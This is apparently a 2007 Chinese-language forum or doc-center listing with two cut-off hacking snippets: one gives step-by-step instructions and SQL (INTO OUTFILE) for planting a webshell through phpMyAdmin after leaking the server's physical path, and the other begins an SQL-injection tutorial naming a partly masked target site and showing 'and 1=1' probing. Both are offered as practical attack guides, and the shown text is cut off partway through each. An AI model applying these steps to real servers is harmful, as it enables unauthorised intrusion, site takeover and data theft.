批量拿webshell
1.如何拿到登陆密码. 自己想办法 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径. 3.选择一个Database.运行以下语句. ----start code--- Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES(''); select cmd from a into outfile 'D:/phpMyAdmin/libraries/d.php'; Drop TABLE IF EXISTS a; ----end code--- 4.如果没什么意外.对应网站得到webshell ps:执行语句后在网站跟目录生...
by -ZeE - php文档中心 - 2007-07-30 12:41:41 阅读(1153) 回复(0)
目标网站:http://www.xxx.org.cn:81\r\n注入点: http://www.xxx.org.cn:81/news.php?id=780\r\n\r\n1.认识注入类型\r\n\r\n不管是asp.aspx.php,注入的标准类型必为\r\nhttp://www.xxxx.com/aa.asp?p=xxx\r\nhttp://www.xxxx.com/aa.aspx?p=xxx\r\nhttp://www.xxxx.com/aa.php?p=xxx\r\n\r\n2.判断是否存在注入\r\n不管是asp.aspx.php,注入点的判断都是这样的\r\nhttp://xxx.xxx.xxx.xxx/down/show.php?id=26 and 1=1返回正常页\r\...
